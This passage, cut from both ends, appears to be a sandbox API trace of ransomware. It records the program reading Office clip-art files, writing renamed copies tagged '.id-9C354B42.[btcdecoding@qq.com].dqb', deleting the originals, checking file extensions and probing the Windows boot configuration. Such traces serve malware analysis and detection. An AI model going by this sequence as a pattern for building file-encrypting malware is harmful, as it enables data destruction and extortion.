lpBuffer=0x3c10020*, lpNumberOfBytesWritten=0x2fcfc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.780] SetEndOfFile (hFile=0x310) returned 1 [0274.780] CloseHandle (hObject=0x310) returned 1 [0274.780] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fcfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.780] SetEndOfFile (hFile=0x328) returned 1 [0274.783] CloseHandle (hObject=0x328) returned 1 [0274.783] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.788] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00222_.wmf")) returned 1 [0274.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0274.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0274.788] lstrlenW (lpString=".doc") returned 4 [0274.788] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.788] lstrlenW (lpString=".docx") returned 5 [0274.788] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.788] lstrlenW (lpString=".pdf") returned 4 [0274.788] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.788] lstrlenW (lpString=".xls") returned 4 [0274.788] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.788] lstrlenW (lpString=".xlsx") returned 5 [0274.788] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.788] lstrlenW (lpString=".ppt") returned 4 [0274.788] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0274.788] lstrlenW (lpString=".zip") returned 4 [0274.788] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.788] lstrlenW (lpString=".rar") returned 4 [0274.788] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.788] lstrlenW (lpString=".bz2") returned 4 [0274.788] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.788] lstrlenW (lpString=".7z") returned 3 [0274.788] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0274.788] lstrlenW (lpString=".dbf") returned 4 [0274.789] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0274.789] lstrlenW (lpString=".1cd") returned 4 [0274.789] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0274.789] lstrlenW (lpString=".jpg") returned 4 [0274.789] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0274.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0274.789] lstrlenW (lpString=".doc") returned 4 [0274.789] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.789] lstrlenW (lpString=".docx") returned 5 [0274.789] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.789] lstrlenW (lpString=".pdf") returned 4 [0274.789] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.789] lstrlenW (lpString=".xls") returned 4 [0274.789] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.789] lstrlenW (lpString=".xlsx") returned 5 [0274.789] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.789] lstrlenW (lpString=".ppt") returned 4 [0274.789] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0274.789] lstrlenW (lpString=".zip") returned 4 [0274.789] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.789] lstrlenW (lpString=".rar") returned 4 [0274.789] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.790] lstrlenW (lpString=".bz2") returned 4 [0274.790] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.790] lstrlenW (lpString=".7z") returned 3 [0274.790] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0274.790] lstrlenW (lpString=".dbf") returned 4 [0274.790] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0274.790] lstrlenW (lpString=".1cd") returned 4 [0274.790] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63 [0274.790] lstrlenW (lpString=".jpg") returned 4 [0274.790] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.790] lstrcmpiW (lpString1=".WMF", lpString2=".dqb") returned 1 [0274.790] lstrlenW (lpString="EN00319_.WMF") returned 12 [0274.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00319_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0274.791] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2fcff1c | out: lpFileSize=0x2fcff1c*=2280) returned 1 [0274.791] CloseHandle (hObject=0x328) returned 1 [0274.791] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00319_.wmf")) returned 0x20 [0274.791] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00319_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00319_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0274.791] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fcfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.791] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fcfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00319_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0274.791] GetLastError () returned 0x0 [0274.791] ReadFile (in: hFile=0x328, lpBuffer=0x3c10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fcfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c10020*, lpNumberOfBytesRead=0x2fcfed4*=0x8e8, lpOverlapped=0x0) returned 1 [0274.793] WriteFile (in: hFile=0x310, lpBuffer=0x3c10020*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x2fcfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c10020*, lpNumberOfBytesWritten=0x2fcfc9c*=0x8f0, lpOverlapped=0x0) returned 1 [0274.794] ReadFile (in: hFile=0x328, lpBuffer=0x3c10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fcfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c10020*, lpNumberOfBytesRead=0x2fcfed4*=0x0, lpOverlapped=0x0) returned 1 [0274.794] WriteFile (in: hFile=0x310, lpBuffer=0x3c10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fcfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c10020*, lpNumberOfBytesWritten=0x2fcfc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.794] SetEndOfFile (hFile=0x310) returned 1 [0274.794] CloseHandle (hObject=0x310) returned 1 [0274.794] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fcfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.794] SetEndOfFile (hFile=0x328) returned 1 [0274.796] CloseHandle (hObject=0x328) returned 1 [0274.796] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.797] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00319_.wmf")) returned 1 [0274.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0274.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0274.797] lstrlenW (lpString=".doc") returned 4 [0274.797] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.797] lstrlenW (lpString=".docx") returned 5 [0274.797] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.797] lstrlenW (lpString=".pdf") returned 4 [0274.797] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.797] lstrlenW (lpString=".xls") returned 4 [0274.797] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.797] lstrlenW (lpString=".xlsx") returned 5 [0274.797] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.797] lstrlenW (lpString=".ppt") returned 4 [0274.797] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0274.798] lstrlenW (lpString=".zip") returned 4 [0274.798] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.798] lstrlenW (lpString=".rar") returned 4 [0274.798] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.798] lstrlenW (lpString=".bz2") returned 4 [0274.798] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.798] lstrlenW (lpString=".7z") returned 3 [0274.798] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0274.798] lstrlenW (lpString=".dbf") returned 4 [0274.798] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0274.798] lstrlenW (lpString=".1cd") returned 4 [0274.798] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0274.798] lstrlenW (lpString=".jpg") returned 4 [0274.798] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0274.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0274.798] lstrlenW (lpString=".doc") returned 4 [0274.798] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.798] lstrlenW (lpString=".docx") returned 5 [0274.798] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.798] lstrlenW (lpString=".pdf") returned 4 [0274.798] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.798] lstrlenW (lpString=".xls") returned 4 [0274.798] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.798] lstrlenW (lpString=".xlsx") returned 5 [0274.798] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.798] lstrlenW (lpString=".ppt") returned 4 [0274.798] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0274.798] lstrlenW (lpString=".zip") returned 4 [0274.799] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.799] lstrlenW (lpString=".rar") returned 4 [0274.799] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.799] lstrlenW (lpString=".bz2") returned 4 [0274.799] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.799] lstrlenW (lpString=".7z") returned 3 [0274.799] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0274.799] lstrlenW (lpString=".dbf") returned 4 [0274.799] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0274.799] lstrlenW (lpString=".1cd") returned 4 [0274.799] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 63 [0274.799] lstrlenW (lpString=".jpg") returned 4 [0274.799] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.799] lstrcmpiW (lpString1=".WMF", lpString2=".dqb") returned 1 [0274.799] lstrlenW (lpString="EN00320_.WMF") returned 12 [0274.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00320_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0274.801] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2fcff1c | out: lpFileSize=0x2fcff1c*=736) returned 1 [0274.801] CloseHandle (hObject=0x328) returned 1 [0274.801] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00320_.wmf")) returned 0x20 [0274.801] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00320_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00320_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0274.801] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fcfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.801] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fcfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00320_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0274.802] GetLastError () returned 0x0 [0274.802] ReadFile (in: hFile=0x328, lpBuffer=0x3c10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fcfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c10020*, lpNumberOfBytesRead=0x2fcfed4*=0x2e0, lpOverlapped=0x0) returned 1 [0274.804] WriteFile (in: hFile=0x324, lpBuffer=0x3c10020*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x2fcfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c10020*, lpNumberOfBytesWritten=0x2fcfc9c*=0x2f0, lpOverlapped=0x0) returned 1 [0274.805] ReadFile (in: hFile=0x328, lpBuffer=0x3c10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fcfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c10020*, lpNumberOfBytesRead=0x2fcfed4*=0x0, lpOverlapped=0x0) returned 1 [0274.805] WriteFile (in: hFile=0x324, lpBuffer=0x3c10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fcfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c10020*, lpNumberOfBytesWritten=0x2fcfc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.805] SetEndOfFile (hFile=0x324) returned 1 [0274.805] CloseHandle (hObject=0x324) returned 1 [0274.805] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fcfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.805] SetEndOfFile (hFile=0x328) returned 1 [0274.807] CloseHandle (hObject=0x328) returned 1 [0274.807] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.807] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00320_.wmf")) returned 1 [0274.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0274.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0274.808] lstrlenW (lpString=".doc") returned 4 [0274.808] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.808] lstrlenW (lpString=".docx") returned 5 [0274.808] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.808] lstrlenW (lpString=".pdf") returned 4 [0274.808] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.808] lstrlenW (lpString=".xls") returned 4 [0274.808] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.808] lstrlenW (lpString=".xlsx") returned 5 [0274.808] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.808] lstrlenW (lpString=".ppt") returned 4 [0274.808] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0274.808] lstrlenW (lpString=".zip") returned 4 [0274.808] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.808] lstrlenW (lpString=".rar") returned 4 [0274.808] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.808] lstrlenW (lpString=".bz2") returned 4 [0274.808] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.808] lstrlenW (lpString=".7z") returned 3 [0274.808] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0274.808] lstrlenW (lpString=".dbf") returned 4 [0274.808] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0274.808] lstrlenW (lpString=".1cd") returned 4 [0274.808] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0274.809] lstrlenW (lpString=".jpg") returned 4 [0274.809] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0274.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0274.809] lstrlenW (lpString=".doc") returned 4 [0274.809] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.809] lstrlenW (lpString=".docx") returned 5 [0274.809] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.809] lstrlenW (lpString=".pdf") returned 4 [0274.809] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.809] lstrlenW (lpString=".xls") returned 4 [0274.809] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.809] lstrlenW (lpString=".xlsx") returned 5 [0274.809] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.809] lstrlenW (lpString=".ppt") returned 4 [0274.809] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0274.809] lstrlenW (lpString=".zip") returned 4 [0274.809] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.809] lstrlenW (lpString=".rar") returned 4 [0274.809] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.809] lstrlenW (lpString=".bz2") returned 4 [0274.809] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.809] lstrlenW (lpString=".7z") returned 3 [0274.809] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0274.809] lstrlenW (lpString=".dbf") returned 4 [0274.809] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0274.809] lstrlenW (lpString=".1cd") returned 4 [0274.809] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 63 [0274.809] lstrlenW (lpString=".jpg") returned 4 [0274.810] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.810] lstrcmpiW (lpString1=".WMF", lpString2=".dqb") returned 1 [0274.810] lstrlenW (lpString="EN00397_.WMF") returned 12 [0274.810] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00397_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0274.810] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2fcff1c | out: lpFileSize=0x2fcff1c*=17308) returned 1 [0274.810] CloseHandle (hObject=0x328) returned 1 [0274.810] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00397_.wmf")) Thread: id = 97 os_tid = 0x674 [0268.846] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3a30060 [0268.846] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3a40068 [0268.846] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634fe8 [0268.847] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x661a00 [0268.847] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x635000 [0268.847] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x3d20020 [0268.847] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634fd0 [0268.847] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634fd0, Size=0x20) returned 0x65b828 [0268.847] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634fd0 [0268.847] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634fd0, Size=0x20) returned 0x65b800 [0268.847] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e20000 [0268.847] GetProcAddress (hModule=0x76e20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e4d650 [0268.847] Wow64DisableWow64FsRedirection (in: OldValue=0x310ff58 | out: OldValue=0x310ff58*=0x0) returned 1 [0268.847] lstrlenW (lpString="kernel32.dll") returned 12 [0268.847] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65b828 | out: hHeap=0x5e0000) returned 1 [0268.847] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0268.847] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65b800 | out: hHeap=0x5e0000) returned 1 [0268.847] Sleep (dwMilliseconds=0x64) [0269.213] lstrlenW (lpString="BCD") returned 3 [0269.213] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.253] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0269.253] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0269.253] lstrlenW (lpString=".doc") returned 4 [0269.253] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0269.253] lstrlenW (lpString=".docx") returned 5 [0269.253] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0269.253] lstrlenW (lpString=".pdf") returned 4 [0269.253] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0269.253] lstrlenW (lpString=".xls") returned 4 [0269.253] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0269.253] lstrlenW (lpString=".xlsx") returned 5 [0269.253] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0269.253] lstrlenW (lpString=".ppt") returned 4 [0269.253] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0269.253] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0269.253] lstrlenW (lpString=".zip") returned 4 [0269.253] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0269.253] lstrlenW (lpString=".rar") returned 4 [0269.253] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0269.253] lstrlenW 